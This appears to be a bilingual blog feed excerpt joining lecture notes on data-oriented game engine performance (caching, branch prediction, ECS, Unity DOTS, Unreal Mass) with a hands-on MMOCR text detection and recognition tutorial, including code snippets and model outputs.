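    ​下面是笔者补充的示意(仅为草图):复用 a、b 会让两段计算形成串行依赖链,而一次性赋值的新名字(正是 SSA 形式所表达的)使两段计算相互独立、可以重叠执行:

    // 复用变量:后两行必须等前两行的读写完成
    int dependent(int x, int y, int p, int q) {
        int a = x + y;
        int b = a * 2;
        a = p + q;  // 复用 a
        b = a * 2;  // 复用 b
        return b;
    }

    // 每个值只赋值一次:两组计算没有名字上的依赖,可并行
    int independent(int x, int y, int p, int q) {
        int a0 = x + y;
        int b0 = a0 * 2;
        int a1 = p + q;
        int b1 = a1 * 2;
        return b0 + b1;
    }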

    False Sharing in Cache Line

    缓存行中的伪共享(False Sharing)

    • Ensuring any rapidly updated variables are kept local to the thread

      确保任何快速更新的变量都保持在线程的本地

    • Cache contention

      缓存争用

    webp
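
    ​下面是笔者补充的伪共享示意(仅为草图,64 字节缓存行为常见假设):两个被不同线程频繁更新的计数器若挤在同一条缓存行上,会互相令对方核心的缓存失效;按缓存行对齐后各占一行即可避免:

    #include <atomic>

    struct PackedCounters {   // a 和 b 很可能落在同一条缓存行上 -> 伪共享
        std::atomic<int> a{0};
        std::atomic<int> b{0};
    };

    struct PaddedCounters {   // 每个计数器独占一条缓存行
        alignas(64) std::atomic<int> a{0};
        alignas(64) std::atomic<int> b{0};
    };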

    Branch prediction

    分支预测

    • CPU will prefetch instructions and data ahead

      CPU 将提前预取指令和数据

    • Use branch prediction techniques to decide what to prefetch

      使用分支预测技术来决定预取什么

    webp

    • To avoid branch mis-prediction

      避免分支预测错误

    int a[10] = {2, 5, 8, 11, 3, 12, 9, 22, 5, 13};
    for (int i = 0; i < 10; i++)
    {
        if (a[i] > 10)
        {
            doFunc1();
        }
        else
        {
            doFunc2();
        }
    }

    webp

    ​如果分支跳转难以预测,预取的指令容易作废、Cache 容易未命中,降低运行速度。

    int a[10] = {2, 3, 5, 5, 8, 9, 11, 12, 13, 22};
    for (int i = 0; i < 10; i++)
    {
        if (a[i] > 10)
        {
            doFunc1();
        }
        else
        {
            doFunc2();
        }
    }

    webp

    ​如果事先将序列排序好,代码就不会跳着执行。

    Existential Processing

    存在处理(Existential Processing)

    for actor in actor_array do
        if actor is alive then
            aliveFunc(actor)
        else
            deadFunc(actor)
        end
    end

    This code also faces branch prediction problems

    此代码还面临分支预测问题

    Unlike the example before, actor_array changes every tick

      与前面的示例不同,actor_array 每个 tick 都会变化(无法事先排序)

    for actor in alive_actor_array do
        aliveFunc(actor)
    end

    for actor in dead_actor_array do
        deadFunc(actor)
    end

    Completely avoid “if-else”

    完全避免“if-else”

    By maintaining 2 lists for the different kinds of actors, we can avoid branch mis-prediction

    通过为不同状态的 actor 各维护一个列表,我们可以避免分支预测错误

    Performance-Sensitive Data Arrangements

    性能敏感数据安排

    Reducing Memory Dependency

    减少内存依赖

    • (chained memory lookups/accesses by pointers)

    (通过指针进行链式内存查找 / 访问)

    webp

    • Load the first cache line 1

      加载第一个缓存行 1

    • Get the next node address

      获取下一个节点地址

    • Cache miss

      缓存未命中

    • Unload the old one, and load another cache line 2

      换出旧的缓存行,再加载另一条缓存行 2

    • Repeating

      重复
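
    ​下面是笔者补充的对比示意(仅为草图):链表遍历是指针追逐,每跳一个节点都可能落在新的缓存行上并触发未命中;连续数组则可被硬件预取器顺序流式读取:

    #include <vector>

    struct Node { int value; Node* next; };

    int sum_list(Node* head) {
        int sum = 0;
        for (Node* n = head; n; n = n->next) // 每一跳都可能缓存未命中
            sum += n->value;
        return sum;
    }

    int sum_array(const std::vector<int>& v) {
        int sum = 0;
        for (int x : v) // 顺序访问,对预取器友好
            sum += x;
        return sum;
    }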

    Array of Structures vs. Structure of Arrays

    结构体数组(AoS)与数组结构体(SoA)

    webp

    webp

    ​SOA 的地址排列要比 AOS 更连续。

    If we want to read the position of all particles, SOA has better performance

    如果我们想读取所有 particles 的位置,SOA 的性能更好。
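
    ​下面是笔者补充的两种布局示意(仅为草图,字段为假设):AoS 逐粒子存放,只读位置时也会把速度、寿命一起带进缓存;SoA 将同一属性连续存放,遍历位置只触碰位置数据,对缓存和 SIMD 都更友好:

    #include <vector>

    // AoS:一个结构体对应一个粒子
    struct ParticleAoS { float px, py, pz; float vx, vy, vz; float life; };
    using ParticlesAoS = std::vector<ParticleAoS>;

    // SoA:每个属性一个连续数组
    struct ParticlesSoA {
        std::vector<float> px, py, pz;
        std::vector<float> vx, vy, vz;
        std::vector<float> life;
    };

    float sum_px(const ParticlesSoA& p) {
        float sum = 0.f;
        for (float x : p.px) // 只读位置:密集、顺序的内存访问
            sum += x;
        return sum;
    }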

    Entity Component System (ECS)

    实体组件系统(ECS)

    Recap: Component-based Design

    回顾:基于组件的设计

    webp

    • Code example

      代码示例

    webp

    Entity Component System (ECS)

    实体组件系统(ECS)

    A pattern to structure game code in a data-oriented way for maximum performance

    一种以面向数据的方式构建游戏代码以获得最大性能的模式

    • Entity: an ID referring to a set of components

      实体:一个指向一组组件的 ID

    • Component: the data to be processed by systems, no logic at all

      组件:系统要处理的数据,根本没有逻辑

    • System: where the logic happens, read/write component data

      系统:逻辑发生的地方,读/写组件数据

    webp
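
    ​下面是笔者补充的一个极简 ECS 示意(仅为草图,类型与函数名均为假设,不代表任何引擎的真实 API):实体只是 ID,组件是并行数组中的纯数据,系统是遍历这些数据的纯逻辑:

    #include <cstdint>
    #include <vector>

    using Entity = uint32_t;

    struct Position { float x, y; }; // 组件:只有数据,没有逻辑
    struct Velocity { float x, y; };

    struct World {
        std::vector<Entity>   entities; // 第 i 个实体拥有下标 i 处的组件
        std::vector<Position> positions;
        std::vector<Velocity> velocities;
    };

    // 系统:逻辑发生的地方,读/写组件数据
    void move_system(World& w, float dt) {
        for (size_t i = 0; i < w.entities.size(); ++i) {
            w.positions[i].x += w.velocities[i].x * dt;
            w.positions[i].y += w.velocities[i].y * dt;
        }
    }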

    Unity Data-Oriented Tech Stack (DOTS)

    面向 Unity 数据的技术栈(DOTS)

    A combination of technologies that work together to deliver a data-oriented approach to coding

    结合多种技术,共同提供面向数据的编码方法

    • The Entity Component System (ECS) provides data-oriented programming framework

      实体组件系统(ECS)提供面向数据的编程框架

    • The C# Job System provides a simple method of generating multithreaded code

      C# 任务系统提供了一种生成多线程代码的简单方法

    • The Burst Compiler generates fast and optimized native code

      Burst 编译器生成快速且优化的本机代码

    webp

    Unity ECS – Archetype

    A specific combination of components

    Archetype 是组件的特定组合

    • Entities are grouped into archetypes

      实体被分组到 archetype 中

    webp

    Unity ECS – Data Layout in Archetype

    Unity ECS——Archetype 中的数据布局

    Same components in an archetype are packed tightly into chunks for cache friendliness

      原型中的相同组件被紧密地打包成块,以提高缓存友好性

    • A chunk is a block of memory with fixed size, e.g. 16KB

      块(chunk)是固定大小的内存块,例如 16KB

    webp

    Unity ECS – System

    Unity ECS——系统

    webp

    public class MoveSystem : SystemBase
    {
        protected override void OnUpdate()
        {
            // For each entity which has Translation and Velocity
            Entities.ForEach(
                // Write to Translation (ref), read Velocity (in)
                (ref Translation trans, in Velocity velocity) =>
                {
                    // Execute for each selected entity
                    trans = new Translation()
                    {
                        // dT is a captured variable
                        Value = trans.Value + velocity.Value * dT
                    };
                }
            ).ScheduleParallel(); // Schedule as a parallel job
        }
    }

    Unity C# Job System

    Unity C# 任务系统

    Make it easier for users to write correct multithreaded code

    使用户更容易编写正确的多线程代码

    • A job is a small unit of work that performs a specific task

      作业是执行特定任务的小工作单元

    • Jobs can depend on other jobs to complete before they run

      作业在运行之前可以依赖其他作业来完成

    public struct FirstJob : IJob
    {
        public void Execute()
        {
            ...
        }
    }

    public struct SecondJob : IJob
    {
        public void Execute()
        {
            ...
        }
    }
    var first_job = new FirstJob();
    var second_job = new SecondJob();

    // execute first_job
    var first_job_handle = first_job.Schedule();

    // second_job depends on first_job to complete
    second_job.Schedule(first_job_handle);

    Unity C# Job System – Native Container

    Unity C# 作业系统——原生容器

    A type of shared memory that can be accessed inside jobs

    一种可以在作业内部访问的共享内存

    • Job cannot output results without a native container (all other data is a copy)

      没有原生容器,作业无法输出结果(所有数据都是副本)

    • Native containers support all safety checks

      原生容器支持所有安全检查

    • Native containers need to be disposed manually

      原生容器需要手动释放(Dispose)

    // Allocate one float with "TempJob" policy
    // Allocator.Temp: Fastest allocation, lifespan is 1 frame or fewer
    // Allocator.TempJob: Slower than Temp, lifespan is 4 frames
    // Allocator.Persistent: Slowest allocation, can last as long as needed
    NativeArray<float> a = new NativeArray<float>(1, Allocator.TempJob);
    ...
    // Need to dispose manually for unmanaged memory
    a.Dispose();

    Unity C# Job System – Safety System

    Unity C# 作业系统——安全系统

    Support safety checks (out of bounds checks, deallocation checks, race condition checks) for jobs

    支持作业的安全检查(越界检查、取消分配检查、竞争条件检查)

    • Send each job a copy of data it needs to operate on to eliminate the race condition

      向每个作业发送一份它需要操作的数据副本,以消除竞争条件

      • Job can only access blittable data types (reference is invalid)

        作业只能访问 blittable 数据类型(引用类型无效)

    public struct Job : IJob
    {
        public float a;
        public float b;
        public void Execute()
        {
            ...
        }
    }

    webp

    High-Performance C# and Burst Compiler

    高性能 C# 和 Burst 编译器

    High-Performance C# (HPC#) is a subset of C#

    高性能 C#(HPC#)是 C# 语言的一个子集

    • Give up on most of the standard library (StringFormatter, List, Dictionary, etc.)

      放弃大部分标准库(StringFormatter、List、Dictionary 等)

    • Disallow allocations, reflection, the garbage collector and virtual calls

      不允许分配、反射、垃圾收集器和虚拟调用

    Burst Compiler translates from IL/.NET bytecode to highly optimized native code using LLVM

      Burst 编译器使用 LLVM 将 IL/.NET 字节码转换为高度优化的本机代码

    • Generate expected machine code for specific platforms

      为特定平台生成预期的机器代码

    webp

    Unreal Mass Framework

    webp

    MassEntity – Entity

    MassEntity——实体

    • FMassEntityHandle is a pure ID serving as the ECS entity

      FMassEntityHandle 是一个纯 ID,充当 ECS 中的实体

    • Index indicates the index in Entities array in FMassEntityManager

      Index 表示其在 FMassEntityManager 的 Entities 数组中的下标

    • SerialNumber as salt to Index

      SerialNumber 作为 Index 的“盐”

      • Release an old entity

        释放旧实体

      • Create a new entity with the same Index

        使用相同的索引创建新实体

      • SerialNumber is increased so the ID will be different

        SerialNumber 增加,因此新旧 ID 不同

    struct FMassEntityHandle
    {
        ...
        int32 Index = 0;
        int32 SerialNumber = 0;
        ...
    }

    struct MASSENTITY_API FMassEntityManager
    {
        ...
        TChunkedArray<FEntityData> Entities;
        TArray<int32> EntityFreeIndexList;
        ...
    }
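
    ​下面是笔者补充的“加盐句柄”示意(仅为假设性草图,EntityData、is_valid 均为示意命名,并非 Unreal 的真实代码):释放旧实体后复用同一 Index 时,SerialNumber 已经增加,旧句柄便不再匹配:

    #include <cstdint>
    #include <vector>

    struct EntityData { int32_t SerialNumber = 0; bool Alive = false; };

    // 句柄 (index, serial) 只有在序列号仍然一致时才有效
    bool is_valid(const std::vector<EntityData>& entities,
                  int32_t index, int32_t serial) {
        return entities[index].Alive && entities[index].SerialNumber == serial;
    }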

    MassEntity – Component

    MassEntity——组件

    • Same as Unity, each type of entity has an Archetype

      与 Unity 相同,每种类型的实体都有一个原型

    • Fragments and tags are components for entities

      Fragment 和 Tag 是实体的组件

    • Tags are constant Boolean components to filter unnecessary processing

      标签是用于过滤不必要处理的常量布尔组件

    struct FMassArchetypeCompositionDescriptor
    {
        ...
        FMassFragmentBitSet Fragments;
        FMassTagBitSet Tags;
        FMassChunkFragmentBitSet ChunkFragments;
        FMassSharedFragmentBitSet SharedFragments;
    }

    webp

    MassEntity – Systems

    MassEntity——系统

    • ECS Systems in MassEntity are Processors derived from UMassProcessor

      MassEntity 中的 ECS 系统是从 UMassProcessor 派生的处理器

    • Two important interfaces: ConfigureQueries() and Execute(...)

      两个重要的接口:ConfigureQueries() 和 Execute(...)

    class MASSENTITY_API UMassProcessor : public UObject
    {
        ...
    protected:
        virtual void ConfigureQueries() PURE_VIRTUAL(UMassProcessor::ConfigureQueries);
        virtual void PostInitProperties() override;
        virtual void Execute(
            FMassEntityManager& EntityManager,
            FMassExecutionContext& Context) PURE_VIRTUAL(UMassProcessor::Execute);
        ...
    }

    MassEntity – Fragment Query

    MassEntity——片段查询

    • Interface ConfigureQueries() runs when the processor is initialized

      处理器初始化时,接口 ConfigureQueries() 运行

    • Use FMassEntityQuery to filter archetypes of entities meeting the system's requirements

      使用 FMassEntityQuery 筛选满足系统要求的实体原型

    • FMassEntityQuery caches filtered archetypes to accelerate future executions

      FMassEntityQuery 缓存经过筛选的原型以加速未来的执行

    webp

    void UMassApplyMovementProcessor::ConfigureQueries()
    {
        EntityQuery.AddRequirement<FMassVelocityFragment>(EMassFragmentAccess::ReadWrite);
        EntityQuery.AddRequirement<FTransformFragment>(EMassFragmentAccess::ReadWrite);
        EntityQuery.AddRequirement<FMassForceFragment>(EMassFragmentAccess::ReadWrite);
        EntityQuery.AddTagRequirement<FMassOffLODTag>(EMassFragmentPresence::None);
        EntityQuery.AddConstSharedRequirement<FMassMovementParameters>(EMassFragmentPresence::All);
    }

    MassEntity – Execute

    MassEntity——执行

    webp

    Conclusions

    结论

    Everything You Need to Know About Performance

    关于性能,你需要知道的一切

    webp

    ​这张图展示了 CPU 各种操作所耗的时间。

    视频

    课程

    1

    文本识别 OCR 神器 MMOCR【OpenMMLab】

    webp

    OpenMMLab 是一个开源人工智能算法体系,涵盖了多种领域的多种人工智能算法的开源实现。

    webp

    open-mmlab/mmocr: OpenMMLab Text Detection, Recognition and Understanding Toolbox (github.com) 是 OpenMMLab 下的一个用于 OCR 领域的工具包。包含如下功能:

    • 文本区域检测
    • 文本内容识别
    • 关键信息提取

    webp

    ​课程所包含的代码实战教程。

    webp

    webp

    ​课程中将基于 TextSnake 给文字区域打马赛克。

    webp

    webp

    webp

    webp

    OCR 即光学字符识别,包含文本区域检测、文本内容识别和关键信息提取。

    webp

    ​对于文本识别,又分为文档文本识别和场景文本识别。

    webp

    ​文本图像可能存在噪音、复杂背景、多语种、倾斜、弯曲、多形状和多种字体等属性,是 OCR 的难点与挑战。

    webp

    ​一般的 OCR 系统流程分为两种:

    • 两步方法
      • 文本区域检测-裁剪出文本区域-文本内容识别
    • 端到端方法
      • 一个统一网络同时完成文本检测和文本识别两个任务

    学会 MMOCR 能做什么

    webp

    webp

    webp

    webp

    webp

    ​清华本科特奖的一个项目。

    webp

    webp

    关键信息提取是 OCR 的下游任务之一。

    webp

    webp

    开源 OCR 算法库:MMOCR

    webp

    ​上述下游任务的实现有些需要调用第三方 API,如果我们想使用自己的数据集进行训练、无限量地使用等,开源的 OCR 算法库是一个好的解决方案。

    webp

    ​MMOCR 集成了若干顶会所提出的前沿算法。

    webp

    ​各种算法的简介和使用方法可以在官方文档中找到。

    webp

    ​MMOCR 所包含的文本区域检测算法:

    • MaskRCNN
    • PAN
    • PSENet
    • DB
    • TextSnake
    • DRRG
    • FCENet

    webp

    ​MMOCR 所包含的文本内容识别算法:

    • CRNN
    • RobustScanner
    • SAR
    • SegOCR
    • Transformer
    • ABINet
    • SATRN

    webp

    webp

    ​MMOCR 包含的 OCR 下游任务——Text Understanding 文本内容理解算法:

    • Key Information Extraction: SDMG-R 关键信息提取
    • Named Entity Recognition: Bert-softmax 命名实体识别

    webp

    ​MMOCR 依赖于 MMDetection 和 MMCV。

    webp

    ​MMOCR 具有模块化设计。

    webp

    webp

    ​MMOCR 所包含的功能:

    • 数据集
      • 常用 OCR 数据集及格式转换工具
    • 训练
      • 单机训练
      • 多机训练
      • 集群训练
      • Slurm 调度器
    • 测试
      • 主流性能评估指标
      • FLOPS 评估
      • 速度评估
    • 可视化
      • 文本检测
      • 文本识别
      • 关键信息提取
    • 部署(便于部署到实际应用中)
      • 导出为 ONNX
      • ONNX 转 TensorRT

    webp

    ​文本区域检测算法的部署,在 OpenVino 中实时调用摄像头进行场景文本检测。

    常用 OCR 数据集和算法评估指标

    webp

    ​常用的文本检测和文本识别的数据集。

    webp

    ​用于场景文本识别的数据集 MJSynth,合成图片背景相对简单。

    webp

    webp

    webp

    webp

    ​数据集由图像和标注两部分组成,对文本检测而言,它的标注范式与图像分割非常类似,都是用多段线去包络一个文字区域。

    webp

    ​对于文本内容识别的任务,标注包含文件名和对应的文字内容。

    webp

    置信度(confidence)
    模型在检测过程中,一个目标上可能会出现多个框,每一个框会对应一个 confidence,confidence 阈值就是之后计算 TP,FP,TN,FN 等参数的界限;
    交并比(IOU)
    计算模型预测出的框和标签中标注的框的 IOU,IOU 用于判定目标是真目标还是假目标,大于 IOU 阈值的框会认定为 True,小于 IOU 阈值的检测框会认定为 False;
    计算 TP,FP,TN,FN

    • TP:大于 IOU 阈值且大于 confidence 阈值(实际是正样本,判定为正样本);(检测对了)
    • FP:小于 IOU 阈值且大于 confidence 阈值(实际是负样本,判定为正样本);(检测错了)
    • TN:小于 IOU 阈值且小于 confidence 阈值(实际是负样本,判定为负样本);(不用于计算)
    • FN:大于 IOU 阈值且小于 confidence 阈值(实际是正样本,判定为负样本);(没检测出来)
    • 文本检测

      • 基于 IoU 计算(预测区域和标记区域的交并集)
        • Precision: TP / (TP + FP) 查准率
        • Recall: TP / (TP + FN) 查全率,TP + FN 为所有正样本的数量
        • hmean:P 与 R 的调和平均数
    • 文本内容识别

      • 基于混淆矩阵计算(本质上是一个分类问题)
        • Accuracy
        • Precision
        • Recall
      • 基于编辑距离/莱文斯坦距离(Levenshtein)计算
        • 1-N.E.D

    $$\mathrm{lev}_{a,b}(i,j)=\begin{cases}\max(i,j) & \text{if }\min(i,j)=0\\ \min\begin{cases}\mathrm{lev}_{a,b}(i-1,j)+1\\ \mathrm{lev}_{a,b}(i,j-1)+1\\ \mathrm{lev}_{a,b}(i-1,j-1)+1_{(a_i\neq b_j)}\end{cases} & \text{otherwise}\end{cases}$$
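
    ​其中 1-N.E.D 按最长字符串长度做归一化(此处为笔者补充的常见定义,供参考):

    $$1-\mathrm{N.E.D.}(a,b)=1-\frac{\mathrm{lev}_{a,b}(|a|,|b|)}{\max(|a|,|b|)}$$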

    webp

    webp

    ​MMOCR 中集成了各种评估指标。

    2

    ​从 TommyZihao/MMOCR_tutorials: Jupyter notebook tutorials for MMOCR (github.com) 获取文件。

    webp

    ​必须完成 A 才可以完成下面的内容!

    A 安装配置 MMOCR

    ​虚拟环境安装 jupyter notebook:在 conda 创建的虚拟环境中安装 jupyter 以及使用_conda 虚拟环境怎么连接 jupyter-CSDN 博客

    ​安装 MMOCR:[Paper-MMOCR-A Comprehensive Toolbox for Text Detection, Recognition and Understanding | Zi-Zi’s Journey](/2024/05/30/Paper-MMOCR-A Comprehensive Toolbox for Text Detection, Recognition and Understanding/)

    ​检查安装成功:

    # 检查 Pytorch
    import torch, torchvision
    print('Pytorch 版本', torch.__version__)
    print('CUDA 是否可用',torch.cuda.is_available())
    Pytorch 版本 1.13.1+cu117
    CUDA 是否可用 True
    # 检查 mmcv
    import mmcv
    from mmcv.ops import get_compiling_cuda_version, get_compiler_version
    print('MMCV 版本', mmcv.__version__)
    print('CUDA 版本', get_compiling_cuda_version())
    print('编译器版本', get_compiler_version())
    MMCV 版本 2.1.0
    CUDA 版本 11.7
    编译器版本 MSVC 192930148
    # 检查 mmocr
    import mmocr
    print('mmocr 版本', mmocr.__version__)
    mmocr 版本 1.0.1

    B1 预训练模型预测-文本识别

    ​导入工具包:

    from mmocr.apis import MMOCRInferencer

    import cv2

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​载入模型,实例化 MMOCRInferencer,rec='svtr-small' 使用 SVTR 模型进行文本识别:mmocr/configs/textrecog/svtr at main · open-mmlab/mmocr (github.com)

    ​下载 https://download.openmmlab.com/mmocr/textrecog/svtr/svtr-small_20e_st_mj/svtr-small_20e_st_mj-35d800d6.pth 并放到合适位置,使用 rec_weights 设定模型位置(如果没有设定,则它会自动下载到一个地方)

    infer = MMOCRInferencer(rec='svtr-small', rec_weights='./models/svtr-small_20e_st_mj-35d800d6.pth')
    Loads checkpoint by local backend from path: ./models/svtr-small_20e_st_mj-35d800d6.pth

    ​载入预测图像,就决定是你了:

    png

    ​场景文本识别模型只支持裁剪出文本区域的小图的识别。

    img_path = './demo/ILoveGZ.png'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​执行预测:

    result = infer(img_path, save_vis=True, return_vis=True)

    ​解析预测结果-文本内容及置信度

    result.keys()
    dict_keys(['predictions', 'visualization'])
    result['predictions']
    [{'rec_texts': ['igz'], 'rec_scores': [0.9166250427563986]}]

    ​解析预测结果-可视化:

    plt.imshow(result['visualization'][0])
    plt.show()

    png

    B2 预训练模型预测-文字区域检测

    ​导入工具包:

    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​载入模型,实例化 MMOCRInferencer,det='textsnake' 使用 TextSnake 模型进行文本检测:[文本检测模型 — MMOCR 1.0.1 文档](https://github.com/open-mmlab/mmocr/tree/main/configs/textrecog/svtr)。

    ​下载 https://download.openmmlab.com/mmocr/textdet/textsnake/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500_20221101_134814-a216e5b2.pth 并放到合适位置,使用 det_weights 设定模型位置(如果没有设定,则它会自动下载到一个地方)

    infer = MMOCRInferencer(det='textsnake', det_weights='./models/textsnake_resnet50-oclip_fpn-unet_1200e_ctw1500_20221101_134814-a216e5b2.pth')

    ​载入预测图像,就决定是你了:

    jpg

    img_path = './demo/HBU.jpg'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​执行预测:

    result = infer(img_path, return_vis=True)

    ​解析预测结果-文字区域及置信度:

    result.keys()
    dict_keys(['predictions', 'visualization'])

    ​解析预测结果-文字区域可视化:

    plt.imshow(result['visualization'][0])
    plt.show()

    png


    ​也可自行加载配置文件(Method)和对应的模型(Model):

    ​从这里下载:文本检测模型 — MMOCR 1.0.1 文档

    infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py', det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth')
    Loads checkpoint by local backend from path: ./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth

    ​预测结果虽然是长方形,但是似乎是检测到了弯曲文本,长方形是经过处理后得到的:

    png


    ​像如下模型:

    infer = MMOCRInferencer(det='dbnet')
    Loads checkpoint by http backend from path: https://download.openmmlab.com/mmocr/textdet/dbnet/dbnet_resnet50-oclip_1200e_icdar2015/dbnet_resnet50-oclip_1200e_icdar2015_20221102_115917-bde8c87a.pth

    ​对于弯曲文本,则检测失败:

    png

    B3 预训练模型预测-端到端 OCR

    ​相当于对一张图片先进行场景文本检测,再进行场景文本识别

    ​导入工具包:

    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

    ​载入场景文本检测模型:DBNet 以及场景文本识别模型:svtr-small

    infer = MMOCRInferencer(det='./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py',
    det_weights='./models/dbnet_resnet18_fpnc_1200e_totaltext-3ed3233c.pth',
    rec='svtr-small')

    ​载入预测图像,就决定是你了:

    jpg

    img_path = './demo/TJ.jpg'
    img_bgr = cv2.imread(img_path)
    plt.imshow(img_bgr[:,:,::-1])
    plt.show()

    png

    ​执行预测并获得结果:

    result = infer(img_path, save_vis=True, return_vis=True)
    result['predictions']
    [{'rec_texts': ['scotland<UKN>s',
    'cotland<UKN>s',
    'scotland<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'cadenhead<UKN>s',
    'shop',
    'whisky',
    'cadenhead',
    'style<UKN>',
    '<UKN>town',
    'italian'],
    'rec_scores': [0.977949458360672,
    ...
    0.9994089433125087],
    'det_polygons': [[759.0371750764526,
    505.635521930197,
    759.5478147298675,
    494.91445790166443,
    809.203618756371,
    497.2781902810802,
    808.6929791029562,
    507.99925430961275],
    ...
    [228.83700465086648,
    339.75968070652175,
    231.53506466615698,
    289.6377231763757,
    546.131936480632,
    306.560987389606,
    543.4338764653415,
    356.6829250169837]],
    'det_scores': [0.579411506652832,
    ...
    0.8963190913200378]}]

    ​得到了文本实例、文本范围以及相应的置信度。

    ​可视化 OCR 结果(可以从 results/vis/ 文件夹下看到):

    jpg

    ​直接本地保存!

    import numpy as np
    from PIL import Image

    Image.fromarray(result['visualization'][0]).save('output_image.png')

    B4 预训练模型预测-OCR 下游任务之 KIE

    ​KIE 即 Key Information Extraction,旨在从图像(或文本)中提取出关键信息。这里 MMOCR 选用了一个 SDMGR 算法,用于发票信息提取。

    jpeg

    ​一阵操作:

    from mmocr.apis import MMOCRInferencer

    import cv2
    import numpy as np

    import matplotlib.pyplot as plt
    %matplotlib inline

    infer = MMOCRInferencer(det='textsnake', rec='svtr-small', kie='SDMGR')
    img_path = './demo/demo_kie.jpeg'
    img_bgr = cv2.imread(img_path)

    result = infer(img_path, save_vis=True, return_vis=True)

    plt.imshow(result['visualization'][0])
    plt.show()

    jpg

    ​感觉这个算法就是将场景文本检测的结果出的框框再进行一个分类操作。

    jpg

    ​对自己的图片似乎也能识别出部分信息。


    ​之后简单介绍了一下场景文本检测和场景文本识别的模型:

    webp
    3

    【C1】训练自己的文本识别模型

    ​读取训练用的配置文件:

    from mmengine import Config

    cfg = Config.fromfile('./configs/textdet/dbnet/dbnet_resnet18_fpnc_1200e_totaltext.py')

    ​配置文件及解析:

    ​这段 Python 代码主要用于配置文本检测模型的训练和测试管道,通常在深度学习框架(如 MMDetection 或类似项目)中使用。以下是对代码各部分的详细解释:

    _base_ = [
    '_base_dbnet_resnet18_fpnc.py', # 基础模型配置文件
    '../_base_/datasets/totaltext.py', # 数据集配置文件
    '../_base_/default_runtime.py', # 默认运行时配置
    '../_base_/schedules/schedule_sgd_1200e.py', # 学习率调度配置
    ]
    • _base_ 列表包含几个基础配置文件的路径,这些文件定义了模型结构、数据集、运行时设置和训练计划等。
    train_pipeline = [
    dict(type='LoadImageFromFile', color_type='color_ignore_orientation'),
    dict(
    type='LoadOCRAnnotations',
    with_polygon=True,
    with_bbox=True,
    with_label=True,
    ),
    dict(type='FixInvalidPolygon', min_poly_points=4),
    dict(
    type='TorchVisionWrapper',
    op='ColorJitter',
    brightness=32.0 / 255,
    saturation=0.5),
    dict(
    type='ImgAugWrapper',
    args=[['Fliplr', 0.5],
    dict(cls='Affine', rotate=[-10, 10]), ['Resize', [0.5, 3.0]]]),
    dict(type='RandomCrop', min_side_ratio=0.1),
    dict(type='Resize', scale=(640, 640), keep_ratio=True),
    dict(type='Pad', size=(640, 640)),
    dict(
    type='PackTextDetInputs',
    meta_keys=('img_path', 'ori_shape', 'img_shape'))
    ]
    • train_pipeline 定义了一系列处理步骤,用于训练数据的预处理:

      • 加载图像:从文件中读取图像,并忽略方向。

      • 加载 OCR 注释:加载与文本检测相关的信息(多边形、边界框和标签)。

      • 修复无效多边形:确保多边形至少包含 4 个顶点。

      • 颜色抖动:随机调整图像的亮度和饱和度,增强训练数据的多样性。

      • 图像增强:包括随机翻转、旋转和缩放。

      • 随机裁剪:根据最小边比进行随机裁剪。

      • 调整大小:将图像调整为 640 x 640 的大小,保持比例。

      • 填充:如果图像小于 640 x 640,则填充至该尺寸。

      • 打包输入:将处理后的图像和元数据打包成模型输入格式。

    test_pipeline = [
    dict(type='LoadImageFromFile', color_type='color_ignore_orientation'),
    dict(type='Resize', scale=(1333, 736), keep_ratio=True),
    dict(
    type='LoadOCRAnnotations',
    with_polygon=True,
    with_bbox=True,
    with_label=True,
    ),
    dict(type='FixInvalidPolygon', min_poly_points=4),
    dict(
    type='PackTextDetInputs',
    meta_keys=('img_path', 'ori_shape', 'img_shape', 'scale_factor'))
    ]
    • test_pipelinetrain_pipeline 类似,但针对测试阶段进行了调整:

      • 图像被调整为 1333 x 736 的大小。

      • 同样加载 OCR 注释并修复无效多边形。

    # dataset settings
    totaltext_textdet_train = _base_.totaltext_textdet_train
    totaltext_textdet_test = _base_.totaltext_textdet_test
    totaltext_textdet_train.pipeline = train_pipeline
    totaltext_textdet_test.pipeline = test_pipeline
    • 从基础配置中获取训练和测试数据集,并为它们指定相应的处理管道。
    train_dataloader = dict(
    batch_size=16,
    num_workers=16,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=True),
    dataset=totaltext_textdet_train)

    val_dataloader = dict(
    batch_size=1,
    num_workers=1,
    pin_memory=True,
    persistent_workers=True,
    sampler=dict(type='DefaultSampler', shuffle=False),
    dataset=totaltext_textdet_test)

    test_dataloader = val_dataloader
    • train_dataloaderval_dataloader 定义了训练和验证的数据加载器:

      • batch_size:每个批次的样本数量(训练为 16,验证为 1)。

      • num_workers:用于数据加载的工作线程数。

      • pin_memory:是否将数据加载到固定内存中,以加快 GPU 训练。

      • persistent_workers:在数据加载过程中保持工作线程持续运行。

      • sampler:数据的采样方式(训练时打乱顺序,验证时不打乱)。

    auto_scale_lr = dict(base_batch_size=16)
    • 配置自动缩放学习率的选项,以便根据基础批次大小动态调整学习率。
    ]]>
    + 视频

    课程

    1

    文本识别 OCR 神器 MMOCR【OpenMMLab】

    webp

    OpenMMLab 是一个开源人工智能算法体系,涵盖了多种领域的多种人工智能算法的开源实现。

    webp

    open-mmlab/mmocr: OpenMMLab Text Detection, Recognition and Understanding Toolbox (github.com) 是 OpenMMLab 下的一个用于 OCR 领域的工具包。包含如下功能:

    • 文本区域检测
    • 文本内容识别
    • 关键信息提取

    webp

    ​课程所包含的代码实战教程。

    webp

    webp

    ​课程中将基于 TextSnake 给文字区域打马赛克。

    webp

    webp

    webp

    webp

